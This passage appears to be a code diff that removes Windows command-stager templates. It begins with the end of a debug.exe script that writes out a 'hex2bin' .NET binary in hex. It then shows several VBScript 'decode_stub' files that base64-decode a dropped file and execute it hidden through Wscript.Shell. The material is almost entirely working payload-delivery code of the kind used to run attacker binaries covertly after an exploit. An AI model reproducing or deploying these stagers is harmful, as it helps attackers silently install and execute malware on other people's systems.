||||
echo e 910 53 79 73 74 65 6d 2e 49 4f >>decoder_stub
|
||||
echo e 91a 46 69 6c 65 >>decoder_stub
|
||||
echo e 91f 52 65 61 64 41 6c 6c 54 65 78 74 >>decoder_stub
|
||||
echo e 92b 53 74 72 69 6e 67 >>decoder_stub
|
||||
echo e 932 52 65 70 6c 61 63 65 >>decoder_stub
|
||||
echo e 93a 67 65 74 5f 4c 65 6e 67 74 68 >>decoder_stub
|
||||
echo e 945 42 79 74 65 >>decoder_stub
|
||||
echo e 94a 53 75 62 73 74 72 69 6e 67 >>decoder_stub
|
||||
echo e 954 43 6f 6e 76 65 72 74 >>decoder_stub
|
||||
echo e 95c 54 6f 42 79 74 65 >>decoder_stub
|
||||
echo e 963 43 6f 6e 63 61 74 >>decoder_stub
|
||||
echo e 96a 46 69 6c 65 53 74 72 65 61 6d >>decoder_stub
|
||||
echo e 975 43 72 65 61 74 65 >>decoder_stub
|
||||
echo e 97c 53 74 72 65 61 6d >>decoder_stub
|
||||
echo e 983 57 72 69 74 65 >>decoder_stub
|
||||
echo e 989 43 6c 6f 73 65 >>decoder_stub
|
||||
echo e 991 49 55 >>decoder_stub
|
||||
echo e 994 73 >>decoder_stub
|
||||
echo e 996 61 >>decoder_stub
|
||||
echo e 998 67 >>decoder_stub
|
||||
echo e 99a 65 >>decoder_stub
|
||||
echo e 99c 3a >>decoder_stub
|
||||
echo e 99e 20 >>decoder_stub
|
||||
echo e 9a0 20 >>decoder_stub
|
||||
echo e 9a2 20 >>decoder_stub
|
||||
echo e 9a4 68 >>decoder_stub
|
||||
echo e 9a6 65 >>decoder_stub
|
||||
echo e 9a8 78 >>decoder_stub
|
||||
echo e 9aa 32 >>decoder_stub
|
||||
echo e 9ac 62 >>decoder_stub
|
||||
echo e 9ae 69 >>decoder_stub
|
||||
echo e 9b0 6e >>decoder_stub
|
||||
echo e 9b2 2e >>decoder_stub
|
||||
echo e 9b4 65 >>decoder_stub
|
||||
echo e 9b6 78 >>decoder_stub
|
||||
echo e 9b8 65 >>decoder_stub
|
||||
echo e 9ba 20 >>decoder_stub
|
||||
echo e 9bc 3c >>decoder_stub
|
||||
echo e 9be 68 >>decoder_stub
|
||||
echo e 9c0 65 >>decoder_stub
|
||||
echo e 9c2 78 >>decoder_stub
|
||||
echo e 9c4 69 >>decoder_stub
|
||||
echo e 9c6 6e >>decoder_stub
|
||||
echo e 9c8 70 >>decoder_stub
|
||||
echo e 9ca 75 >>decoder_stub
|
||||
echo e 9cc 74 >>decoder_stub
|
||||
echo e 9ce 66 >>decoder_stub
|
||||
echo e 9d0 69 >>decoder_stub
|
||||
echo e 9d2 6c >>decoder_stub
|
||||
echo e 9d4 65 >>decoder_stub
|
||||
echo e 9d6 3e >>decoder_stub
|
||||
echo e 9d8 08 >>decoder_stub
|
||||
echo e 9da 01 03 0d >>decoder_stub
|
||||
echo e 9df 01 >>decoder_stub
|
||||
echo e 9e1 03 0a >>decoder_stub
|
||||
echo e 9e5 09 2e >>decoder_stub
|
||||
echo e 9e8 65 >>decoder_stub
|
||||
echo e 9ea 78 >>decoder_stub
|
||||
echo e 9ec 65 >>decoder_stub
|
||||
echo e 9f0 06 24 bb c2 bc b7 11 40 bf c4 9c a7 d7 ed 8c f2 >>decoder_stub
|
||||
echo e a01 08 b7 7a 5c 56 19 34 e0 89 05 >>decoder_stub
|
||||
echo e a0c 01 01 1d 0e 03 20 >>decoder_stub
|
||||
echo e a13 01 04 20 01 01 0e 04 20 01 01 02 05 20 01 01 11 3d 04 20 01 >>decoder_stub
|
||||
echo e a27 01 08 04 >>decoder_stub
|
||||
echo e a2b 01 01 0e 04 >>decoder_stub
|
||||
echo e a30 01 0e 0e 05 20 02 0e 0e 0e 03 20 >>decoder_stub
|
||||
echo e a3c 08 05 20 02 0e 08 08 05 >>decoder_stub
|
||||
echo e a45 02 05 0e 08 05 >>decoder_stub
|
||||
echo e a4b 02 0e 0e 0e 05 >>decoder_stub
|
||||
echo e a51 01 12 5d 0e 07 20 03 01 1d 05 08 08 0b 07 07 0e 1d 05 08 0e >>decoder_stub
|
||||
echo e a65 08 12 5d 02 0c 01 >>decoder_stub
|
||||
echo e a6c 07 68 65 78 32 62 69 6e >>decoder_stub
|
||||
echo e a76 05 01 >>decoder_stub
|
||||
echo e a7c 17 01 >>decoder_stub
|
||||
echo e a7f 12 43 6f 70 79 72 69 67 68 74 20 c2 a9 20 20 32 30 30 38 >>decoder_stub
|
||||
echo e a94 29 01 >>decoder_stub
|
||||
echo e a97 24 66 39 39 39 62 62 62 31 2d 66 31 30 61 2d 34 39 65 38 2d >>decoder_stub
|
||||
echo e aab 38 33 35 37 2d 30 35 39 61 30 63 65 37 37 31 36 38 >>decoder_stub
|
||||
echo e abe 0c 01 >>decoder_stub
|
||||
echo e ac1 07 31 2e 30 2e 30 2e 30 >>decoder_stub
|
||||
echo e acb 08 01 >>decoder_stub
|
||||
echo e ace 07 01 >>decoder_stub
|
||||
echo e ad4 08 01 >>decoder_stub
|
||||
echo e ad7 08 >>decoder_stub
|
||||
echo e add 1e 01 >>decoder_stub
|
||||
echo e ae0 01 >>decoder_stub
|
||||
echo e ae2 54 02 16 57 72 61 70 4e 6f 6e 45 78 63 65 70 74 69 6f 6e 54 >>decoder_stub
|
||||
echo e af6 68 72 6f 77 73 01 >>decoder_stub
|
||||
echo e b00 85 18 7c 48 >>decoder_stub
|
||||
echo e b08 02 >>decoder_stub
|
||||
echo e b0c 53 >>decoder_stub
|
||||
echo e b10 18 28 >>decoder_stub
|
||||
echo e b14 18 0a >>decoder_stub
|
||||
echo e b18 52 53 44 53 e8 fc 2e 9d aa 52 59 42 a5 63 1e b1 c8 f6 59 23 >>decoder_stub
|
||||
echo e b2c 03 >>decoder_stub
|
||||
echo e b30 53 3a 5c 73 74 75 66 66 5c 70 72 6f 67 72 61 6d 6d 69 6e 67 >>decoder_stub
|
||||
echo e b44 5c 68 65 78 32 62 69 6e 5c 68 65 78 32 62 69 6e 5c 6f 62 6a >>decoder_stub
|
||||
echo e b58 5c 44 65 62 75 67 5c 68 65 78 32 62 69 6e 2e 70 64 62 >>decoder_stub
|
||||
echo e b6c 94 28 >>decoder_stub
|
||||
echo e b78 ae 28 >>decoder_stub
|
||||
echo e b7d 20 >>decoder_stub
|
||||
echo e b94 a0 28 >>decoder_stub
|
||||
echo e ba2 5f 43 6f 72 45 78 65 4d 61 69 6e >>decoder_stub
|
||||
echo e bae 6d 73 63 6f 72 65 65 2e 64 6c 6c >>decoder_stub
|
||||
echo e bbe ff 25 >>decoder_stub
|
||||
echo e bc1 20 40 >>decoder_stub
|
||||
echo e d0e 02 >>decoder_stub
|
||||
echo e d10 10 >>decoder_stub
|
||||
echo e d14 20 >>decoder_stub
|
||||
echo e d17 80 18 >>decoder_stub
|
||||
echo e d1c 38 >>decoder_stub
|
||||
echo e d1f 80 >>decoder_stub
|
||||
echo e d2e 01 >>decoder_stub
|
||||
echo e d30 01 >>decoder_stub
|
||||
echo e d34 50 >>decoder_stub
|
||||
echo e d37 80 >>decoder_stub
|
||||
echo e d46 01 >>decoder_stub
|
||||
echo e d48 01 >>decoder_stub
|
||||
echo e d4c 68 >>decoder_stub
|
||||
echo e d4f 80 >>decoder_stub
|
||||
echo e d5e 01 >>decoder_stub
|
||||
echo e d64 80 >>decoder_stub
|
||||
echo e d76 01 >>decoder_stub
|
||||
echo e d7c 90 >>decoder_stub
|
||||
echo e d80 a0 40 >>decoder_stub
|
||||
echo e d84 a0 02 >>decoder_stub
|
||||
echo e d90 40 43 >>decoder_stub
|
||||
echo e d94 ea 01 >>decoder_stub
|
||||
echo e da0 a0 02 34 >>decoder_stub
|
||||
echo e da6 56 >>decoder_stub
|
||||
echo e da8 53 >>decoder_stub
|
||||
echo e daa 5f >>decoder_stub
|
||||
echo e dac 56 >>decoder_stub
|
||||
echo e dae 45 >>decoder_stub
|
||||
echo e db0 52 >>decoder_stub
|
||||
echo e db2 53 >>decoder_stub
|
||||
echo e db4 49 >>decoder_stub
|
||||
echo e db6 4f >>decoder_stub
|
||||
echo e db8 4e >>decoder_stub
|
||||
echo e dba 5f >>decoder_stub
|
||||
echo e dbc 49 >>decoder_stub
|
||||
echo e dbe 4e >>decoder_stub
|
||||
echo e dc0 46 >>decoder_stub
|
||||
echo e dc2 4f >>decoder_stub
|
||||
echo e dc8 bd 04 ef fe >>decoder_stub
|
||||
echo e dce 01 >>decoder_stub
|
||||
echo e dd2 01 >>decoder_stub
|
||||
echo e dda 01 >>decoder_stub
|
||||
echo e de0 3f >>decoder_stub
|
||||
echo e de8 04 >>decoder_stub
|
||||
echo e dec 01 >>decoder_stub
|
||||
echo e dfc 44 >>decoder_stub
|
||||
echo e e00 01 >>decoder_stub
|
||||
echo e e02 56 >>decoder_stub
|
||||
echo e e04 61 >>decoder_stub
|
||||
echo e e06 72 >>decoder_stub
|
||||
echo e e08 46 >>decoder_stub
|
||||
echo e e0a 69 >>decoder_stub
|
||||
echo e e0c 6c >>decoder_stub
|
||||
echo e e0e 65 >>decoder_stub
|
||||
echo e e10 49 >>decoder_stub
|
||||
echo e e12 6e >>decoder_stub
|
||||
echo e e14 66 >>decoder_stub
|
||||
echo e e16 6f >>decoder_stub
|
||||
echo e e1c 24 >>decoder_stub
|
||||
echo e e1e 04 >>decoder_stub
|
||||
echo e e22 54 >>decoder_stub
|
||||
echo e e24 72 >>decoder_stub
|
||||
echo e e26 61 >>decoder_stub
|
||||
echo e e28 6e >>decoder_stub
|
||||
echo e e2a 73 >>decoder_stub
|
||||
echo e e2c 6c >>decoder_stub
|
||||
echo e e2e 61 >>decoder_stub
|
||||
echo e e30 74 >>decoder_stub
|
||||
echo e e32 69 >>decoder_stub
|
||||
echo e e34 6f >>decoder_stub
|
||||
echo e e36 6e >>decoder_stub
|
||||
echo e e3e b0 04 >>decoder_stub
|
||||
echo e e41 02 >>decoder_stub
|
||||
echo e e44 01 >>decoder_stub
|
||||
echo e e46 53 >>decoder_stub
|
||||
echo e e48 74 >>decoder_stub
|
||||
echo e e4a 72 >>decoder_stub
|
||||
echo e e4c 69 >>decoder_stub
|
||||
echo e e4e 6e >>decoder_stub
|
||||
echo e e50 67 >>decoder_stub
|
||||
echo e e52 46 >>decoder_stub
|
||||
echo e e54 69 >>decoder_stub
|
||||
echo e e56 6c >>decoder_stub
|
||||
echo e e58 65 >>decoder_stub
|
||||
echo e e5a 49 >>decoder_stub
|
||||
echo e e5c 6e >>decoder_stub
|
||||
echo e e5e 66 >>decoder_stub
|
||||
echo e e60 6f >>decoder_stub
|
||||
echo e e64 dc 01 >>decoder_stub
|
||||
echo e e68 01 >>decoder_stub
|
||||
echo e e6a 30 >>decoder_stub
|
||||
echo e e6c 30 >>decoder_stub
|
||||
echo e e6e 30 >>decoder_stub
|
||||
echo e e70 30 >>decoder_stub
|
||||
echo e e72 30 >>decoder_stub
|
||||
echo e e74 34 >>decoder_stub
|
||||
echo e e76 62 >>decoder_stub
|
||||
echo e e78 30 >>decoder_stub
|
||||
echo e e7c 38 >>decoder_stub
|
||||
echo e e7e 08 >>decoder_stub
|
||||
echo e e80 01 >>decoder_stub
|
||||
echo e e82 46 >>decoder_stub
|
||||
echo e e84 69 >>decoder_stub
|
||||
echo e e86 6c >>decoder_stub
|
||||
echo e e88 65 >>decoder_stub
|
||||
echo e e8a 44 >>decoder_stub
|
||||
echo e e8c 65 >>decoder_stub
|
||||
echo e e8e 73 >>decoder_stub
|
||||
echo e e90 63 >>decoder_stub
|
||||
echo e e92 72 >>decoder_stub
|
||||
echo e e94 69 >>decoder_stub
|
||||
echo e e96 70 >>decoder_stub
|
||||
echo e e98 74 >>decoder_stub
|
||||
echo e e9a 69 >>decoder_stub
|
||||
echo e e9c 6f >>decoder_stub
|
||||
echo e e9e 6e >>decoder_stub
|
||||
echo e ea4 68 >>decoder_stub
|
||||
echo e ea6 65 >>decoder_stub
|
||||
echo e ea8 78 >>decoder_stub
|
||||
echo e eaa 32 >>decoder_stub
|
||||
echo e eac 62 >>decoder_stub
|
||||
echo e eae 69 >>decoder_stub
|
||||
echo e eb0 6e >>decoder_stub
|
||||
echo e eb4 30 >>decoder_stub
|
||||
echo e eb6 08 >>decoder_stub
|
||||
echo e eb8 01 >>decoder_stub
|
||||
echo e eba 46 >>decoder_stub
|
||||
echo e ebc 69 >>decoder_stub
|
||||
echo e ebe 6c >>decoder_stub
|
||||
echo e ec0 65 >>decoder_stub
|
||||
echo e ec2 56 >>decoder_stub
|
||||
echo e ec4 65 >>decoder_stub
|
||||
echo e ec6 72 >>decoder_stub
|
||||
echo e ec8 73 >>decoder_stub
|
||||
echo e eca 69 >>decoder_stub
|
||||
echo e ecc 6f >>decoder_stub
|
||||
echo e ece 6e >>decoder_stub
|
||||
echo e ed4 31 >>decoder_stub
|
||||
echo e ed6 2e >>decoder_stub
|
||||
echo e ed8 30 >>decoder_stub
|
||||
echo e eda 2e >>decoder_stub
|
||||
echo e edc 30 >>decoder_stub
|
||||
echo e ede 2e >>decoder_stub
|
||||
echo e ee0 30 >>decoder_stub
|
||||
echo e ee4 38 >>decoder_stub
|
||||
echo e ee6 0c >>decoder_stub
|
||||
echo e ee8 01 >>decoder_stub
|
||||
echo e eea 49 >>decoder_stub
|
||||
echo e eec 6e >>decoder_stub
|
||||
echo e eee 74 >>decoder_stub
|
||||
echo e ef0 65 >>decoder_stub
|
||||
echo e ef2 72 >>decoder_stub
|
||||
echo e ef4 6e >>decoder_stub
|
||||
echo e ef6 61 >>decoder_stub
|
||||
echo e ef8 6c >>decoder_stub
|
||||
echo e efa 4e >>decoder_stub
|
||||
echo e efc 61 >>decoder_stub
|
||||
echo e efe 6d >>decoder_stub
|
||||
echo e f00 65 >>decoder_stub
|
||||
echo e f04 68 >>decoder_stub
|
||||
echo e f06 65 >>decoder_stub
|
||||
echo e f08 78 >>decoder_stub
|
||||
echo e f0a 32 >>decoder_stub
|
||||
echo e f0c 62 >>decoder_stub
|
||||
echo e f0e 69 >>decoder_stub
|
||||
echo e f10 6e >>decoder_stub
|
||||
echo e f12 2e >>decoder_stub
|
||||
echo e f14 65 >>decoder_stub
|
||||
echo e f16 78 >>decoder_stub
|
||||
echo e f18 65 >>decoder_stub
|
||||
echo e f1c 48 >>decoder_stub
|
||||
echo e f1e 12 >>decoder_stub
|
||||
echo e f20 01 >>decoder_stub
|
||||
echo e f22 4c >>decoder_stub
|
||||
echo e f24 65 >>decoder_stub
|
||||
echo e f26 67 >>decoder_stub
|
||||
echo e f28 61 >>decoder_stub
|
||||
echo e f2a 6c >>decoder_stub
|
||||
echo e f2c 43 >>decoder_stub
|
||||
echo e f2e 6f >>decoder_stub
|
||||
echo e f30 70 >>decoder_stub
|
||||
echo e f32 79 >>decoder_stub
|
||||
echo e f34 72 >>decoder_stub
|
||||
echo e f36 69 >>decoder_stub
|
||||
echo e f38 67 >>decoder_stub
|
||||
echo e f3a 68 >>decoder_stub
|
||||
echo e f3c 74 >>decoder_stub
|
||||
echo e f40 43 >>decoder_stub
|
||||
echo e f42 6f >>decoder_stub
|
||||
echo e f44 70 >>decoder_stub
|
||||
echo e f46 79 >>decoder_stub
|
||||
echo e f48 72 >>decoder_stub
|
||||
echo e f4a 69 >>decoder_stub
|
||||
echo e f4c 67 >>decoder_stub
|
||||
echo e f4e 68 >>decoder_stub
|
||||
echo e f50 74 >>decoder_stub
|
||||
echo e f52 20 >>decoder_stub
|
||||
echo e f54 a9 >>decoder_stub
|
||||
echo e f56 20 >>decoder_stub
|
||||
echo e f58 20 >>decoder_stub
|
||||
echo e f5a 32 >>decoder_stub
|
||||
echo e f5c 30 >>decoder_stub
|
||||
echo e f5e 30 >>decoder_stub
|
||||
echo e f60 38 >>decoder_stub
|
||||
echo e f64 40 >>decoder_stub
|
||||
echo e f66 0c >>decoder_stub
|
||||
echo e f68 01 >>decoder_stub
|
||||
echo e f6a 4f >>decoder_stub
|
||||
echo e f6c 72 >>decoder_stub
|
||||
echo e f6e 69 >>decoder_stub
|
||||
echo e f70 67 >>decoder_stub
|
||||
echo e f72 69 >>decoder_stub
|
||||
echo e f74 6e >>decoder_stub
|
||||
echo e f76 61 >>decoder_stub
|
||||
echo e f78 6c >>decoder_stub
|
||||
echo e f7a 46 >>decoder_stub
|
||||
echo e f7c 69 >>decoder_stub
|
||||
echo e f7e 6c >>decoder_stub
|
||||
echo e f80 65 >>decoder_stub
|
||||
echo e f82 6e >>decoder_stub
|
||||
echo e f84 61 >>decoder_stub
|
||||
echo e f86 6d >>decoder_stub
|
||||
echo e f88 65 >>decoder_stub
|
||||
echo e f8c 68 >>decoder_stub
|
||||
echo e f8e 65 >>decoder_stub
|
||||
echo e f90 78 >>decoder_stub
|
||||
echo e f92 32 >>decoder_stub
|
||||
echo e f94 62 >>decoder_stub
|
||||
echo e f96 69 >>decoder_stub
|
||||
echo e f98 6e >>decoder_stub
|
||||
echo e f9a 2e >>decoder_stub
|
||||
echo e f9c 65 >>decoder_stub
|
||||
echo e f9e 78 >>decoder_stub
|
||||
echo e fa0 65 >>decoder_stub
|
||||
echo e fa4 30 >>decoder_stub
|
||||
echo e fa6 08 >>decoder_stub
|
||||
echo e fa8 01 >>decoder_stub
|
||||
echo e faa 50 >>decoder_stub
|
||||
echo e fac 72 >>decoder_stub
|
||||
echo e fae 6f >>decoder_stub
|
||||
echo e fb0 64 >>decoder_stub
|
||||
echo e fb2 75 >>decoder_stub
|
||||
echo e fb4 63 >>decoder_stub
|
||||
echo e fb6 74 >>decoder_stub
|
||||
echo e fb8 4e >>decoder_stub
|
||||
echo e fba 61 >>decoder_stub
|
||||
echo e fbc 6d >>decoder_stub
|
||||
echo e fbe 65 >>decoder_stub
|
||||
echo e fc4 68 >>decoder_stub
|
||||
echo e fc6 65 >>decoder_stub
|
||||
echo e fc8 78 >>decoder_stub
|
||||
echo e fca 32 >>decoder_stub
|
||||
echo e fcc 62 >>decoder_stub
|
||||
echo e fce 69 >>decoder_stub
|
||||
echo e fd0 6e >>decoder_stub
|
||||
echo e fd4 34 >>decoder_stub
|
||||
echo e fd6 08 >>decoder_stub
|
||||
echo e fd8 01 >>decoder_stub
|
||||
echo e fda 50 >>decoder_stub
|
||||
echo e fdc 72 >>decoder_stub
|
||||
echo e fde 6f >>decoder_stub
|
||||
echo e fe0 64 >>decoder_stub
|
||||
echo e fe2 75 >>decoder_stub
|
||||
echo e fe4 63 >>decoder_stub
|
||||
echo e fe6 74 >>decoder_stub
|
||||
echo e fe8 56 >>decoder_stub
|
||||
echo e fea 65 >>decoder_stub
|
||||
echo e fec 72 >>decoder_stub
|
||||
echo e fee 73 >>decoder_stub
|
||||
echo e ff0 69 >>decoder_stub
|
||||
echo e ff2 6f >>decoder_stub
|
||||
echo e ff4 6e >>decoder_stub
|
||||
echo e ff8 31 >>decoder_stub
|
||||
echo e ffa 2e >>decoder_stub
|
||||
echo e ffc 30 >>decoder_stub
|
||||
echo e ffe 2e >>decoder_stub
|
||||
echo e 1000 30 >>decoder_stub
|
||||
echo e 1002 2e >>decoder_stub
|
||||
echo e 1004 30 >>decoder_stub
|
||||
echo e 1008 38 >>decoder_stub
|
||||
echo e 100a 08 >>decoder_stub
|
||||
echo e 100c 01 >>decoder_stub
|
||||
echo e 100e 41 >>decoder_stub
|
||||
echo e 1010 73 >>decoder_stub
|
||||
echo e 1012 73 >>decoder_stub
|
||||
echo e 1014 65 >>decoder_stub
|
||||
echo e 1016 6d >>decoder_stub
|
||||
echo e 1018 62 >>decoder_stub
|
||||
echo e 101a 6c >>decoder_stub
|
||||
echo e 101c 79 >>decoder_stub
|
||||
echo e 101e 20 >>decoder_stub
|
||||
echo e 1020 56 >>decoder_stub
|
||||
echo e 1022 65 >>decoder_stub
|
||||
echo e 1024 72 >>decoder_stub
|
||||
echo e 1026 73 >>decoder_stub
|
||||
echo e 1028 69 >>decoder_stub
|
||||
echo e 102a 6f >>decoder_stub
|
||||
echo e 102c 6e >>decoder_stub
|
||||
echo e 1030 31 >>decoder_stub
|
||||
echo e 1032 2e >>decoder_stub
|
||||
echo e 1034 30 >>decoder_stub
|
||||
echo e 1036 2e >>decoder_stub
|
||||
echo e 1038 30 >>decoder_stub
|
||||
echo e 103a 2e >>decoder_stub
|
||||
echo e 103c 30 >>decoder_stub
|
||||
echo e 1040 ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e >>decoder_stub
|
||||
echo e 1054 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 20 >>decoder_stub
|
||||
echo e 1068 73 74 61 6e 64 61 6c 6f 6e 65 3d 22 79 65 73 22 3f 3e 0d 0a >>decoder_stub
|
||||
echo e 107c 3c 61 73 73 65 6d 62 6c 79 20 78 6d 6c 6e 73 3d 22 75 72 6e >>decoder_stub
|
||||
echo e 1090 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 >>decoder_stub
|
||||
echo e 10a4 6f 6d 3a 61 73 6d 2e 76 31 22 20 6d 61 6e 69 66 65 73 74 56 >>decoder_stub
|
||||
echo e 10b8 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 0d 0a 20 20 3c 61 73 >>decoder_stub
|
||||
echo e 10cc 73 65 6d 62 6c 79 49 64 65 6e 74 69 74 79 20 76 65 72 73 69 >>decoder_stub
|
||||
echo e 10e0 6f 6e 3d 22 31 2e 30 2e 30 2e 30 22 20 6e 61 6d 65 3d 22 4d >>decoder_stub
|
||||
echo e 10f4 79 41 70 70 6c 69 63 61 74 69 6f 6e 2e 61 70 70 22 2f 3e 0d >>decoder_stub
|
||||
echo e 1108 0a 20 20 3c 74 72 75 73 74 49 6e 66 6f 20 78 6d 6c 6e 73 3d >>decoder_stub
|
||||
echo e 111c 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f >>decoder_stub
|
||||
echo e 1130 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 3e 0d 0a 20 20 20 >>decoder_stub
|
||||
echo e 1144 20 3c 73 65 63 75 72 69 74 79 3e 0d 0a 20 20 20 20 20 20 3c >>decoder_stub
|
||||
echo e 1158 72 65 71 75 65 73 74 65 64 50 72 69 76 69 6c 65 67 65 73 20 >>decoder_stub
|
||||
echo e 116c 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d >>decoder_stub
|
||||
echo e 1180 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 33 22 >>decoder_stub
|
||||
echo e 1194 3e 0d 0a 20 20 20 20 20 20 20 20 3c 72 65 71 75 65 73 74 65 >>decoder_stub
|
||||
echo e 11a8 64 45 78 65 63 75 74 69 6f 6e 4c 65 76 65 6c 20 6c 65 76 65 >>decoder_stub
|
||||
echo e 11bc 6c 3d 22 61 73 49 6e 76 6f 6b 65 72 22 20 75 69 41 63 63 65 >>decoder_stub
|
||||
echo e 11d0 73 73 3d 22 66 61 6c 73 65 22 2f 3e 0d 0a 20 20 20 20 20 20 >>decoder_stub
|
||||
echo e 11e4 3c 2f 72 65 71 75 65 73 74 65 64 50 72 69 76 69 6c 65 67 65 >>decoder_stub
|
||||
echo e 11f8 73 3e 0d 0a 20 20 20 20 3c 2f 73 65 63 75 72 69 74 79 3e 0d >>decoder_stub
|
||||
echo e 120c 0a 20 20 3c 2f 74 72 75 73 74 49 6e 66 6f 3e 0d 0a 3c 2f 61 >>decoder_stub
|
||||
echo e 1220 73 73 65 6d 62 6c 79 3e 0d 0a >>decoder_stub
|
||||
echo e 1301 20 >>decoder_stub
|
||||
echo e 1304 0c >>decoder_stub
|
||||
echo e 1308 c0 38 >>decoder_stub
|
||||
echo w >>decoder_stub
|
||||
echo q >>decoder_stub
|
|
@ -1,40 +0,0 @@
|
|||
echo Set fs = CreateObject("Scripting.FileSystemObject") >>decode_stub
|
||||
echo Set file = fs.GetFile("ENCODED") >>decode_stub
|
||||
echo If file.Size Then >>decode_stub
|
||||
echo Set fd = fs.OpenTextFile("ENCODED", 1) >>decode_stub
|
||||
echo data = fd.ReadAll >>decode_stub
|
||||
echo data = Replace(data, vbCrLf, "") >>decode_stub
|
||||
echo data = base64_decode(data) >>decode_stub
|
||||
echo fd.Close >>decode_stub
|
||||
echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("DECODED", 2, True) >>decode_stub
|
||||
echo ofs.Write data >>decode_stub
|
||||
echo ofs.close >>decode_stub
|
||||
echo Set shell = CreateObject("Wscript.Shell") >>decode_stub
|
||||
echo shell.run "DECODED", 0, false >>decode_stub
|
||||
echo Else >>decode_stub
|
||||
echo Wscript.Echo "The file is empty." >>decode_stub
|
||||
echo End If >>decode_stub
|
||||
echo Function base64_decode(byVal strIn) >>decode_stub
|
||||
echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
|
||||
echo For n = 1 To Len(strIn) Step 4 >>decode_stub
|
||||
echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
|
||||
echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
|
||||
echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
|
||||
echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
|
||||
echo If Not w2 Then _ >>decode_stub
|
||||
echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
|
||||
echo If Not w3 Then _ >>decode_stub
|
||||
echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
|
||||
echo If Not w4 Then _ >>decode_stub
|
||||
echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
|
||||
echo Next >>decode_stub
|
||||
echo base64_decode = strOut >>decode_stub
|
||||
echo End Function >>decode_stub
|
||||
echo Function mimedecode(byVal strIn) >>decode_stub
|
||||
echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>decode_stub
|
||||
echo If Len(strIn) = 0 Then >>decode_stub
|
||||
echo mimedecode = -1 : Exit Function >>decode_stub
|
||||
echo Else >>decode_stub
|
||||
echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
|
||||
echo End If >>decode_stub
|
||||
echo End Function >>decode_stub
|
|
@ -1,50 +0,0 @@
|
|||
echo Dim var_origLoc >>decode_stub
|
||||
echo var_origLoc = SetLocale(1033) >>decode_stub
|
||||
echo Set fs = CreateObject("Scripting.FileSystemObject") >>decode_stub
|
||||
echo Set file = fs.GetFile("ENCODED") >>decode_stub
|
||||
echo If file.Size Then >>decode_stub
|
||||
echo Set fd = fs.OpenTextFile("ENCODED", 1) >>decode_stub
|
||||
echo data = fd.ReadAll >>decode_stub
|
||||
echo data = Replace(data, vbCrLf, "") >>decode_stub
|
||||
echo data = base64_decode(data) >>decode_stub
|
||||
echo fd.Close >>decode_stub
|
||||
echo Dim var_strmConv, var_writedir, var_writestream >>decode_stub
|
||||
echo var_writedir = "DECODED" >>decode_stub
|
||||
echo Set var_strmConv = CreateObject("ADODB.Stream") >>decode_stub
|
||||
echo var_strmConv.Type = 2 >>decode_stub
|
||||
echo var_strmConv.Charset = "x-ansi" >>decode_stub
|
||||
echo var_strmConv.Open >>decode_stub
|
||||
echo var_strmConv.WriteText data, 0 >>decode_stub
|
||||
echo var_strmConv.Position = 0 >>decode_stub
|
||||
echo var_strmConv.Type = 1 >>decode_stub
|
||||
echo var_strmConv.SaveToFile var_writedir, 2 >>decode_stub
|
||||
echo SetLocale(var_origLoc) >>decode_stub
|
||||
echo Set shell = CreateObject("Wscript.Shell") >>decode_stub
|
||||
echo shell.run "DECODED", 0, false >>decode_stub
|
||||
echo Else >>decode_stub
|
||||
echo Wscript.Echo "The file is empty." >>decode_stub
|
||||
echo End If >>decode_stub
|
||||
echo Function base64_decode(byVal strIn) >>decode_stub
|
||||
echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
|
||||
echo For n = 1 To Len(strIn) Step 4 >>decode_stub
|
||||
echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
|
||||
echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
|
||||
echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
|
||||
echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
|
||||
echo If Not w2 Then _ >>decode_stub
|
||||
echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
|
||||
echo If Not w3 Then _ >>decode_stub
|
||||
echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
|
||||
echo If Not w4 Then _ >>decode_stub
|
||||
echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
|
||||
echo Next >>decode_stub
|
||||
echo base64_decode = strOut >>decode_stub
|
||||
echo End Function >>decode_stub
|
||||
echo Function mimedecode(byVal strIn) >>decode_stub
|
||||
echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>decode_stub
|
||||
echo If Len(strIn) = 0 Then >>decode_stub
|
||||
echo mimedecode = -1 : Exit Function >>decode_stub
|
||||
echo Else >>decode_stub
|
||||
echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
|
||||
echo End If >>decode_stub
|
||||
echo End Function >>decode_stub
|
|
@ -1,49 +0,0 @@
|
|||
echo Dim encodedFile, decodedFile, scriptingFS, scriptShell, emptyString, tempString, Base64Chars, tempDir >>decode_stub
|
||||
echo encodedFile = Chr(92)+CHRENCFILE >>decode_stub
